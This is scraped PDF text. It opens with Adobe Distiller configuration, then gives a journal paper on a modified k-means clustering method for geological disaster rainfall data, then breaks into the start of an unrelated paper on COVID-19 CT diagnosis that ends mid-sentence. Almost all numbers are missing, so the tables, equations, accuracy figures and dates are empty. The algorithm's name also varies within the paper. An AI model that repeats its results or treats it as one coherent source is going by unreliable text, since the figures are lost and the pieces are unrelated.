/jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice iet submission template international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - application of k-means algorithm in geological disaster monitoring system wang jianguo college of computer science and engineering xi’an technological university no. middle xuefu road, weiyang district, xi’an, , china e-mail: wjg_xit@ .com, xue linyao * college of computer science and engineering xi’an technological university no. middle xuefu road, weiyang district, xi’an, , china e-mail: @qq.com abstract—the k-means algorithm is considered to be the most important unsupervised machine learning method in clustering, which can divide all the data into k subclasses that are very different from each other. as k-means algorithm is simple and efficient, it is applied to data mining, knowledge discovery and other fields. this paper proposes cmu-kmeans algorithm with improved upgma algorithm and canopy algorithm. the experimental results is that the algorithm can not only get the number k of the initial clustering center adaptable, but also avoid the influence of the noise data and the edge data. also, the improved algorithm can void the initial effect of the random selection on the clustering, which reflects the actual distribution in the dataset. keywords-clustering analysis; cmu-kmeans algorithm; geological disaster monitoring data i. introduction the occurrence of geological disasters caused great casualties to humans, the main reasons include landslides and debris flow and rainfall and so on. and these geological disasters always cause many local public facilities to be damaged by large and small, and brought great damage to the people and their property. also, there are still many such cases in china. faced with such a severe threat of geological disasters, the state and the government on the prevention and control of geological disasters into a lot of human and material resources, and achieved remarkable results. with the progress of technology and high development of information technology, many new detection equipments have been put into the geological disaster real-time detection, such as gps, secondary sound wave monitoring, radar and so on. with the development of geological hazard detection technology, the amount of the monitoring data grew by leaps and bounds, data types are becoming more and more complex as well. k-means algorithm is a clustering algorithm based on the classification of the classic algorithm, the algorithm in the industrial and commercial applications more widely. as we all know, it both has many advantages and many disadvantages. in this paper, we mainly study the optimization of the initial clustering center and the avoidance of the blindness of the k-value selection, and propose the cmu-kmeans algorithm. the data source of the study is the historical data detected by the geological disaster monitoring system, and records are randomly selected from the rainfall data of different areas in shaanxi province as the research object, which are served as a representative sample of the improved k-means clustering algorithm. the experimental results show that the improved algorithm not only eliminates the sensitivity to the initial input and improve the stability and effectiveness of the algorithm, but also can intelligently determine the initial clustering center number k, which improves the simplicity and operability of the algorithm. a. overview of k-means algorithm the k-means algorithm is a classical unsupervised clustering algorithm. the purpose is to divide a given dataset containing n objects into k clusters so that the objects in the cluster are as similar as possible, and the objects between clusters are as similar as possible. set the sample set x = {x , x , x , ..., xn}, n is the number of samples. the idea of the k-means algorithm is that the k data objects are randomly selected from the sample set x as the initial clustering center, and then the data is allocated to the most similar cluster according to the similarity degree of each data object and k clustering centers; recalculate the average of each new cluster and regard it as the next clustering center and repeat the process until the updated cluster center is consistent with the update, that is, the criterion function e converges. the goal is to make the object similarity in the cluster the largest, and the similarity between the objects is the smallest. the degree of similarity between the data can be determined by calculating the euclidean distance between the data. for the n-dimensional real vector space, the euclidean distance of two points is defined as form. :   here, and are the attribute values of x and y respectively, and the criterion function is defined as form. :   here, k is the total number of clusters, and is the center of cluster c. the flow of k-means algorithm is shown in fig. . international journal of advanced network, monitoring and controls volume , no. , figure . k-means clustering algorithm flow chart b. research status quo of k-means algorithm for the advantages of k-means algorithm, it has been widely used in practice, but there are many shortcomings as well. in order to get better clustering effect, many researchers have explored the shortcomings of improving k- means. aiming at the shortcomings of k-means algorithm in selecting the initial point, many scholars have proposed an improved method. duan guiqin [ ] uses the method of product based on mean and maximum distance to optimize the initial clustering center. the algorithm first selects the set of data objects which are the farthest from the sample set to join the clustering center, and then the set of mean and current poly the largest data object of the class center is added to the clustering center set, which improves the accuracy. yi baolin [ ] et al. proposed another improved k- means algorithm, which first calculates the density of the region to which the data object belongs, and then selects k points as the initial center in the high density region. the experimental results show that the algorithm reduces the initial center point impact. yiu-ming cheng[ ] and others proposed a new clustering technique called k * -means algorithm. the algorithm consists of two separate steps. a center point is provided for each cluster in the first step; and then adjust the unit through adaptive learning rules in the second step. the algorithm overcomes the shortcomings of k-means algorithm initial center sensitivity and k value blindness, but the calculation is complicated. xie and others [ ] proposed a k-means algorithm to optimize the initial clustering center by using the minimum variance based on the sample space distribution compactness information. the algorithm chooses the samples with the smallest variance and a distance away from each other as the initial clustering center. liu jiaxing et al.[ ] proposed a radius-based k-means + λ algorithm. when selecting the initial center point of the cluster, the distance ratio between points is calculated from the λ parameter and rounded at a specific distance. in the circle, an initialized center point is selected according to the distance ratio, and the algorithm has higher performance in error rate and operation time. ren jiangtao[ ] proposed an improved k-means algorithm for text clustering, which is improved by using feature selection and dimension reduction, sparse vector selection, initial center point search based on density and spreading, class accuracy, stability and other aspects have improved. c. the performance analysis of k-means algorithm k-means clustering algorithm uses the euclidean distance to calculate the distance between each sample point. for the convex and spherical data distribution, the clustering effect is better and has been widely used in many fields. however, the euclidean distance criterion adopted by the algorithm also has some limitations. for the more complicated or non-convex data, the clustering effect is often not very satisfactory. clustering algorithm in the iterative process, if you do not meet the termination criteria will recalculate the average clustering center, this operation also improves the convergence rate of the clustering algorithm. in summary, k-means clustering algorithm has the following advantages and disadvantages of the following aspects. ) the main advantages of k-means algorithm: a) k-means clustering algorithm has high stability and scalability, clustering effect is very well. b) the results of the treatment is intuitive and easy to understand. when dealing with the target data in numerical form, its geometric meaning is very clear. when clustering images and texts, the extracted eigenvalues can be regarded as clustering result values for the convenience of people's understanding. c) k-means clustering algorithm when dealing with numerical data sets, the input data sequence will not affect the clustering result. d) it can be a good judge of the data set shape is convex cluster. ) the main shortcomings of k-means algorithm: a) the k value in the k-means algorithm needs to be given in advance. according to the k value determined in advance, the clustering samples are classified into k class, so that the sum of squares of all the samples in the clustering domain to the clustering center is minimized. b) clustering results are highly dependent on the selection of initial clustering centers. the k-means algorithm uses the stochastic method to select the initial clustering center. if the initial clustering center is chosen improperly, it is difficult to obtain the ideal clustering effect. this dependence on the initial value may lead to the international journal of advanced network, monitoring and controls volume , no. , instability of the clustering results, and it is easy to fall into the local optimal rather than the global optimal results. c) sensitive to noise and isolated points. d) the time complexity of the algorithm is large. ii. improvement of k-means algorithm and its application aiming at the shortcomings of traditional k-means algorithm, this paper mainly improves on the optimization of initial clustering center to enhance the clustering effect. a. the selection of data object in cluster analysis the preliminary data are collected firstly when data selecting, then know about the characteristics of data to identify the quality of the data and to find a basic observation of the data or assume the implied information to monitor the subset of data of interest. the data object segmentation variable determines the formation of clustering, which in turn affects the correct interpretation of the clustering results, and ultimately affects the stability of the clustering clusters after the new data objects are added. before the k-means clustering related data mining, the sample data set related to the data mining clustering analysis should be extracted from the original data object set, and it is not necessary to use all the historical data. in addition, we should pay attention to the quality of data, only high-quality data to the correct analysis of conclusions everywhere, to provide a scientific basis for clustering. the source of this research object is the historical monitoring data of the geological disaster monitoring system. from the records of geological monitoring data from to , a representative sample of k-means clustering algorithm for this improved algorithm is selected as the object of study in , and the two samples of rainfall are randomly selected in different regions. the sample data attributes show as table : table i. the sample data attributes field number field name field code type of data id xx number sno yy varchar type type varchar gettime time datatime alarm level alarm integer value value double day value d_value double for the cluster analysis, there are obviously redundant ones in the data attributes of the above geological hazard monitoring system, and it does not have the objectivity of the cluster analysis data. therefore, the redundant ones should be eliminated. finally, only four data object attributes reflecting the characteristics of rainfall data are selected as the research object. the optimized data attributes show as table : table ii. the optimized data attributes field number field name field code type of data id xx number sno yy varchar gettime time datatime day value d_value double b. improvement of k-means algorithm it is not difficult to see that, through the above study of the status quo, we can see that most of the above algorithm improvements are only a single defect in the traditional k- means algorithm is optimized. although these improvements have optimized the k-means algorithm to some extent, there are still many shortcomings. for the above geological disaster monitoring system rainfall data characteristics, the k-means algorithm is very sensitive to the initialization center, and the initial clustering center is very easy to make the clustering result into the local optimum and the influence of the isolated point is large. in this paper, the simple random sampling technique is used to reduce the scale of the data set on the original dataset, and then the improved upgma algorithm and canopy algorithm are combined to propose the cmu-kmeans algorithm. the improved algorithm can select the points with the furthest distance k in the high density region as the initial clustering center according to the regional density of each data, so that the improved k-means algorithm can produce high quality poly the results show that the sensitivity of the algorithm is not only eliminated, but also the stability and validity of the algorithm are improved. ) improved upgma algorithm a) the basic idea of improved upgma algorithm at the beginning of the upgma algorithm, each data object in the sample data set is considered as a separate class; and calculates the distance between each two data objects to obtains the distance matrix, then merges the two data objects that are closest to each other to obtain a new subclass, repeat the process .the upgma algorithm stops until no new class is generated or the stop condition is satisfied. it can be found that the first subclasses are usually located in the dense area of the data set, so the subclass center selected by this algorithm can be used as the initial clustering center candidate point for the next step. in this way, the selection of the initial clustering center is optimized and its accuracy is improved. the distance between two data objects is measured using the euclidean distance formula, as form :    d m ik jk k sqrt x x           here, xi and xj represent the data objects in the sample data set. xi={xi ,xi ,…,xik,…,xim},k= , ,…,m xj={xi ,xi ,…,xik,…,xjm},k= , ,…,m the formula for calculating subclasses is as form : international journal of advanced network, monitoring and controls volume , no. ,  n j z x n j    here, n refers to the number of data objects contained in a subclass, and xj refers to a data object in the subclass. b) the description of improved upgma algorithm input: all data in the sample data set, parameters m, p, q; output: initial clustering center candidate point. ( ) set each data object as a separate class; ( ) calculate the distance between two data objects, and then merge the nearest two classes into a new subclass to determine whether the subclass of the data object containing no less than m% of the total amount of data continues to produce , if not, then go to ( ); ( ) for (i = to maxcluster) { { for (j = i + to maxcluster) { if the number of data objects in subclasses i and j is less than or equal to m% of the total amount of data, calculate the distance between them to obtain the distance matrix. } } find the nearest two subclasses i and j and merge them into a new subclass, then add the new subclass to the end of the sequence q to go to ( ); ( ) select the former p% subclasses in the sequence q as the candidate subclasses and calculate the centers of all candidate subclasses as the initial clustering center candidate points. using the advantage of the improved upgma hierarchical clustering algorithm, we can find the dense region of the data set,which avoid the edge data and the noise data become the initial center candidate point. at the same time, considering the relative intensity of the region, we propose new clustering conditions and filter conditions to change the traditional upgma algorithm, so that the generation of subtrees can be stopped at different clustering levels to adapt to the actual density distribution data set. but the improved upgma algorithm also has some shortcomings. for example, if the m% and p% values are not set properly, the selection of the initial clustering center candidate points may be too dense and centralized. however, the canopy algorithm, which introduces the idea of maximum and minimum distance, can select the data points that are far apart from each other. it is necessary to make up the deficiencies of the improved upgma algorithm. therefore, it is necessary to introduce the canopy algorithm to ensure that the distribution of the initial clustering center is decentralized, which can correctly reflect the data distribution of the original data set. ) improved canopy algorithm in order to avoid the clustering process is locally optimal, it is necessary to make canopy get the center point spacing as large as possible. the maximum and minimum distance method [ ] is a kind of test-based algorithm in the field of pattern recognition. its basic idea is to take the object as far as possible as a cluster center, trying to get a better initial division. the algorithm not only intelligently determines the number k in the initial clustering, but also improves the efficiency of dividing the initial data set. a) the description of improved canopy algorithm the euclidean distance method is used to measure the degree of dissimilarity between data objects. set the data set, s={x ,x ,…,xn}, and the initial cluster center set is v = {v , v , ..., vn}. the improved canopy algorithm is described as follows: input: improve the initial clustering center candidate point of the upgma algorithm output, the parameter θ; output: optimize the initial clustering center. ( ) arbitrarily select a data object from the data set s as the first cluster center point v and put it into v; ( ) calculate the distance between v and all the data objects remaining in the data set s, and put the farthest data object into v as the second cluster center v ; ( ) calculate the distance di between all the data objects xi and all the data objects remaining in the data set s, select the smaller distance and denote min (di); ( ) selects the maximum value in all the min(di) , marked as max (min (di)), and regard the corresponding data xi as the candidate cluster center, then judgment is made by the discriminant formula max (min (di))> θ || v - v ||. if the condition is satisfied, xi is added to the initial clustering center set v, and if it is not satisfied, ( ) to ( ); ( ) output optimization of the initial clustering center. the most critical step in the improved canopy algorithm is the step ( ), which takes the corresponding point of max as the candidate of the new clustering center, thus avoiding the fact that the distance from an existing clustering center is closer to the other clustering centers are far away as candidates for possible candidates. therefore, the algorithm can be used to ensure that each new clustering center is far from the distance of the existing clustering center. b) the analysis of advantages and disadvantages of improved algorithm of canopy the improved canopy algorithm can use the k data objects farthest from each other in the data set as the initial clustering center, so as to avoid the situation that the initial clustering center distribution is too concentrated and intensive. but on the one hand, it is possible to select the noise data and the edge data, making the algorithm easy to fall into the local optimal solution, it is difficult to get the global optimal solution. on the other hand, if the sample size of the whole data set is n, we need to scan the database first if we want to find a new cluster center each time; after finding the nearest distance from each object to the existing cluster center, we need scan the database to get the maximum-minimum distance. so we need a total of n distance calculation. the time complexity of the improved canopy algorithm is: o (nk) .if the k clustering centers need to be found in the end of algorithm. therefore, the computational complexity of the improved canopy algorithm depends on the size of n, and there are thousands of objects in large databases usually, if we treat the original data set international journal of advanced network, monitoring and controls volume , no. , with the improved canopy algorithm directly, the implementation efficiency is low and the required storage space will be significantly increased. ) mcu-kmeans algorithm generally, in order to ensure fully reflecting the distribution of data in the entire data set, every cluster center should be distributed in the high density area of the data set and dispersed as much as possible. based on the above considerations, this paper proposes the mcu-kmeans algorithm, which combines the improved upgma algorithm and the improved canopy algorithm to obtain the optimized initial clustering center, and then apply these optimized initial clustering centers to the k-means algorithm to enhance the clustering effect. among them, the improved upgma algorithm is used to find the high density region, so that the selected initial clustering center candidate point away from the noise data and edge data; and the improved canopy algorithm is used to avoid that the initial clustering center distribution is too concentrated and dense to ensure that the distances between the cluster center points are far away, which fully reflect the overall distribution of the data set. therefore, the improved upgma algorithm and the improved canopy algorithm complement each other so that the initial clustering centers selected by the algorithm are far apart from each other and all are located in the high density region of the data set. to sum up, the cmu-kmeans algorithm is as follows. a) the initialization of the cluster center;  improved upgma algorithm: obtain the initial clustering center candidate point;  improved canopy algorithm: obtain the appropriate initial clustering center; b) k-means algorithm iteration; c) the assessment of clustering results. it can be seen that the framework of the cmu-kmeans algorithm is divided into three phases, as shown in figure , the first stage of the algorithm is the initial optimization algorithm, which is the most important part of the improvement. the purpose is to intelligently capture the original the optimal initial clustering seed and the optimal initial clustering number of the data set distribution. the second stage is the main body of the algorithm, and the k- means algorithm is used to cluster on the whole data set and get the clustering result. the third stage is experiment and evaluated to verify the validity of the proposed cmu- kmeans algorithm. it can be seen that the framework of the cmu-kmeans algorithm is divided into three phases, as shown in fig. , the first stage of the algorithm is the initial optimization algorithm, which is the most important part of the improvement. the purpose is to intelligently capture the optimal initial clustering seed and the number of the data set distribution. the second stage is the main body of the algorithm, and the k-means algorithm is used to cluster on the whole data set and get the clustering result. the third stage is experiment and evaluated to verify the validity of the proposed cmu-kmeans algorithm. figure . cmu-kmeans algorithm framework the cmu-kmeans algorithm proposed in this paper can effectively reduce the dependency of the k-means algorithm on the initial clustering center selection. for the data set with uneven data distribution, on the one hand, it avoids the idea that the initial clustering center is too dense; on the other hand, it avoids the fact that the selected initial clustering centers are too scattered and even select noise data and edge data is happening, which can improve the stability and validity of the algorithm. at the same time, the number k of the initial clustering center can be automatically determined without the pre-set and the simplicity and maneuverability of the algorithm can be improved. iii. experiment analysis a. experimental description the data set selected from the experiment comes from the rainfall data collected in the geological hazard detection system and the rainfall data set after the artificial noise is added. the experimental environment is: inter(r)core(tm)i - m, g ram, g hard disk, win operating system. in order to verify the validity and stability of the algorithm, the traditional k-means clustering algorithm, the improved canopy algorithm and the cmu-kmeans algorithm are compared under the rainfall data set. the clustering result of the traditional k-means algorithm is an average of executions. evaluate the performance of the algorithm according to the accuracy of the clustering results and the recall rate. b. performance evaluation criteria the traditional k-means algorithm, the improved canopy algorithm and the clustering effect of cmu-kmeans algorithm proposed in this paper are evaluated by the commonly used evaluation method to evaluate the quality of clustering effect, namely, precision and recall. the accuracy and recall rate are defined as follows: p(i, j)= precision(i, j) = ni,j / ni ( ) international journal of advanced network, monitoring and controls volume , no. , r(i, j)= recall(i, j) = ni,j / nj ( ) here, ni, j represents the number of classes i in cluster j; ni is the number of all objects in class i; nj is the number of all objects in cluster j. c. experimental content and structure analysis table below shows the detailed experimental results of the three algorithms on the geo-disaster monitoring system rainfall data set. table iii. detailed experimental results on the rainfall dataset rainf all set k-means algorithm improved canopy algorithm cmu-kmeans algorithm precisi on recall precisi on recall precisi on recall st . . . . . . nd . . . . . . rd . . . . . . th . . . . . . th . . . . . . th . . . . . . th . . . . . . th . . . . . . th . . . . . . th . . . . . . average . . . . . . as can be seen from the above table, in ten experiments, values of the two performance evaluation criteria (precision and recall)vary greatly based on the traditional k-means algorithm ,showing a very unstable state. to precision as an example, the minimum value of the ten experimental results is . , and the maximum is . , the difference is . , and the recall is different from . . the result of the improved canopy algorithm has improved, the precision is . , and the difference is . . in the cmu-kmeans algorithm, the values of the two performance evaluation criteria are obviously improved and are still stable. the precision of the ten results is . , the maximum is . , the difference is . , and the recovery value is . . in order to make the experimental results more straightforward, the above experimental results with the wave diagram shown in order to compare the stability of the two algorithms and accuracy. figure . the precision and recall values of the traditional k-means algorithm figure . the precision and recall values of the improved cannopy algorithm . % . % . % . % . % . % recall precision . % . % . % . % . % . % precision recall international journal of advanced network, monitoring and controls volume , no. , figure . the precision and recall values of the cmu-kmeans algorithm it can be seen from fig. , fig. and fig. that the improved canopy algorithm clustering effect is improved on the basis of the traditional k-means algorithm. the improved cmu-kmeans algorithm can improve the state of the improved canopy algorithm. the precision and recall value of the cmu-kmeans algorithm are small and obviously improved, and the lifting effect is significant. iv. conclusion the cmu-kmeans algorithm improves the clustering effect, make the performance tend to be stable, and the computational complexity of the calculation is obviously reduced compared with the traditional k-means algorithm and the improved canopy algorithm. also, the algorithm can adaptively determine the number k of the initial clustering center, avoid the influence of the noise data and the edge data and random selection of initial clustering center, and also well reflect the actual distribution of clustering center in the dataset. references [ ] zhai d h,yu j,gao f,et al. k-means text clustering algorithm based oninitial cluster centers selection according to maximum distance [j]. application research of computers, , ( ): – . [ ] baolin yi,haiquan qiao,fan yang,chenwei xu. an improved initialization center algorithm for k-means clustering[c]. computational intelligence and software engineering, ,pp: - . [ ] redmond s j,heneghan c.a method for initializing the k-means clustering algorithm using kd-trees[j]. pattern recognition letters, , ( ): - . [ ] liu j x, zhu g h, xi m. a k-means algorithm based on the radius [j]. journal of guilin university of electronic technology, , ( ): - . [ ] habibpour r, khalipour k. a new k-means and k-nearest-neighbor algorithms for text document clustering [j]. international journal of academic research part a, , ( ) : - . [ ] data mining techniques and applications - a decade review from to [j]. shu-hsien liao, pei-hui chu, pei-yuan hsiao. expert systems with applicati--ons . ( ). [ ] application of improved k-means clustering algorithm in transit data collection. ying wu, chun long yao. rd international conference on biomedical engineering and informatics (bmet). . [ ] zhou a w, yu y f. the research about clustering algorithm of k- means [j]. computer technology and development, , ( ): - . [ ] duan g q. auto generation cloud optimization based on genetic algorithm [j]. computer and digital engineering, , ( ): - . [ ] wang c l, zhang j x. improved k-means algorithm based on latent dirichlet allocation for text clustering [j]. journal of computer applications, , ( ): - . [ ] deepa v k,geetha j r r. rapid development of applications in data mining[c]. green high performance computing (icghpc), ,pp: - . [ ] sharma s, agrawal j, agarwal s, et al. machinelearn-ing techniques for data mining: a survey[c]. com-putational intelligence and computing research (iccic), ,pp: - . [ ] efficient data clustering algorithms: improvements over kmeans[j]. mohamed abubaker, wesam ashour. international journal of intelligent systems and applications(ijisa). ( ). [ ] fahad a, alshatri n, tari z, alamri a. a survey of clustering algorithms for big data: taxonomy and empirical analysis[c]. emerging topics in computing. : - . [ ] abubaker m, ashour wesam. efficient data clustering algorithm algorithms:improvemwnts over k-means[j]. i nternational journal of intelligent systems and applications. ( ): - . [ ] tang zhaoxia, zhang hui. improved k-means clustering algorithm based on genetic algorithm[c], telkomnika indonesian journal of electrical engineering. , pp: - . . % . % . % . % . % . % precision recall http://kns.cnki.net/kcms/detail/detail.aspx?filename=sjes &dbcode=ssjd http://kns.cnki.net/kcms/detail/detail.aspx?filename=sjes &dbcode=ssjd http://kns.cnki.net/kcms/detail/detail.aspx?filename=sjms &dbcode=ssjd fusi-cad: coronavirus (covid- ) diagnosis based on the fusion of cnns and handcrafted features fusi-cad: coronavirus (covid- ) diagnosis based on the fusion of cnns and handcrafted features dina a. ragab and omneya attallah electronics and communications engineering department, arab academy for science, technology, and maritime transport (aastmt), alexandria, egypt abstract the precise and rapid diagnosis of coronavirus (covid- ) at the very primary stage helps doctors to manage patients in high workload conditions. in addition, it prevents the spread of this pandemic virus. computer-aided diagnosis (cad) based on artificial intelligence (ai) techniques can be used to distinguish between covid- and non-covid- from the computed tomography (ct) imaging. furthermore, the cad systems are capable of delivering an accurate faster covid- diagnosis, which consequently saves time for the disease control and provides an efficient diagnosis compared to laboratory tests. in this study, a novel cad system called fusi-cad based on ai techniques is proposed. almost all the methods in the literature are based on individual convolutional neural networks (cnn). consequently, the fusi-cad system is based on the fusion of multiple different cnn architectures with three handcrafted features including statistical features and textural analysis features such as discrete wavelet transform (dwt), and the grey level co-occurrence matrix (glcm) which were not previously utilized in coronavirus diagnosis. the sars-cov- ct-scan dataset is used to test the performance of the proposed fusi-cad. the results show that the proposed system could accurately differentiate between covid- and non-covid- images, as the accuracy achieved is %. additionally, the system proved to be reliable as well. this is because the sensitivity, specificity, and precision attained to %. in addition, the diagnostics odds ratio (dor) is ≥ . furthermore, the results are compared with recent related studies based on the same dataset. the comparison verifies the competence of the proposed fusi-cad over the other related cad systems. thus, the novel fusi-cad system can be employed in real diagnostic scenarios for achieving accurate testing for covid- and avoiding human misdiagnosis that might exist due to human fatigue. it can also reduce the time and exertion made by the radiologists during the examination process. subjects artificial intelligence, computer aided design, computer vision keywords computer-aided diagnosis (cad), convolution neural networks (cnn), coronavirus (covid- ), discrete wavelet transform (dwt), grey level co-occurrence matrix (glcm) introduction the novel virus known as the severe acute respiratory syndrome coronavirus (sars-cov- ) has emerged in december in wuhan, china. patients diseased with sars-cov- can experience a medical condition known as coronavirus diseases how to cite this article ragab da, attallah o. . fusi-cad: coronavirus (covid- ) diagnosis based on the fusion of cnns and handcrafted features. peerj comput. sci. :e doi . /peerj-cs. submitted august accepted september published october corresponding authors dina a. ragab, dinaragab@aast.edu omneya attallah, o.attallah@aast.edu academic editor robertas damaševičius additional information and declarations can be found on page doi . /peerj-cs. copyright ragab and attallah distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:dinaragab@�aast.�edu mailto:o.�attallah@�aast.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ (covid- ). this new coronavirus has quickly spread to other zones in china and other countries with significant morbidity and mortality rates. on april , , more than , covid- infected patients have been verified in china, and more than . million patients worldwide (dong et al., ). covid- may lead to critical respiratory illness, acute pneumonia, numerous organs failure, and even death (cheng et al., ). for this reason, the early detection of this virus is essential, as it is achieving a primary initial assessment so that the succeeding arrangement of suitable treatments and follow-ups can be set in advance. pandemic covid- has led to a rapid increase in the number of new patients. consequently, an overload in hospital capacity occurred, and healthcare management became a difficult task (wu et al., ; paules, marston & fauci, ). in addition, the doctors and nurses are at risk of being infected, and thus they will not be capable of helping patients and managing their jobs (butt et al., ). therefore, a rapid and accurate diagnostic tool is crucial to help doctors in managing their patients. the standard way of screening infected patients is known as the reverse-transcription polymerase chain reaction (rt-pcr) testing (dong et al., ). although rt-pcr is the common method to diagnose covid- cases, it has some limitations. first, the sensitivity of the rt-pcr test is not quite high, and therefore covid- disease may not be completely omitted, despite if rt-pcr outcomes from a suspected case are negative (ai et al., ). moreover, the inadequate quantity and firm necessities for laboratory settings would critically postpone precise identification of suspected individuals, which has modeled extraordinary challenges to avoid the propagation of the disease worldwide, specifically in the middle of the epidemic region (xie et al., ). thus, medical imaging, in specific, chest-computed tomography (ct), is preferred as another tool in the diagnosis and management of the novel coronavirus. ct offers a faster and simpler solution for medical diagnosis of covid- . it is used as well in observing of disease progression and the assessment of treatment efficiency (iwasawa et al., ; attallah et al., a). ct is considered as the main element of the diagnostic and treatment process for suspected cases due to its manifestations, which have been reported in several recent articles (lei et al., ; chung et al., ; song et al., a). moreover, it can be used alone by the radiologists due to the overlap of the appearance of covid- with other types of pneumonia, which challenges the examination process (shi, han & zheng, ). furthermore, manual examination using ct images needs lots of manual employment time-consuming. therefore, the health industry is considering other new technologies to screen and control the spread of the novel coronavirus pandemic. artificial intelligence (ai) is an example of such technologies that can tackle the propagation of such disease, recognize patients at risk, control this virus in real-time, and automatically detect and diagnose suspected cases (vaishya et al., ). machine learning (ml) and deep learning (dl) are classes of ai, which have the potential to enhance the diagnosis and treatment planning of covid- cases, being an evidence-based medical tool (attallah et al., b, a; karthikesalingam et al., ). computer-aided diagnosis (cad) systems based on ai techniques such as ml and specifically dl have been described as an effective tool to diagnose and detect numerous ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ diseases and abnormalities from medical images (ragab, sharkas & attallah, ; attallah, sharkas & gadelkarim, ; ragab et al., ; attallah, sharkas & gadelkarim, ; attallah, gadelkarim & sharkas, ). the cad systems were used to diagnose several lung diseases such as tuberculosis (ke et al., ). the authors in wei et al. ( b) and capizzi et al. ( ) used ct images to classify lung nodule images. recently, the cad systems have been used for diagnosing and identifying covid- disease from other types of pneumonia. the authors in wieczorek, silka & woźniak ( ) employed a multicenter study that combines ct images for covid- patients from several countries to deliver probably a wide range of values about predicted covid- spread. the authors constructed a convolutional neural network (cnn) architecture, which is consists of seven layers. the network is trained by nadam, which is selected in tests for the greatest effectiveness and shortest training time achieving an accuracy %. zheng et al. ( ) used unet++ to segment lesions in ct images. afterward, the bounding box of the segmented lesion was generated. finally, a d-cnn was constructed for predicting the probability of covid- . the proposed method reached a sensitivity of . %, a specificity of . %, and an area under the receiver-operating curve (auc) of . ( . %). there were two limitations in this technique; first, the number of cases was small. moreover, the unet++ used in the segmentation of images may result in segmenting the infection areas that have small blood vessels that reduce the performance of the cad system. the 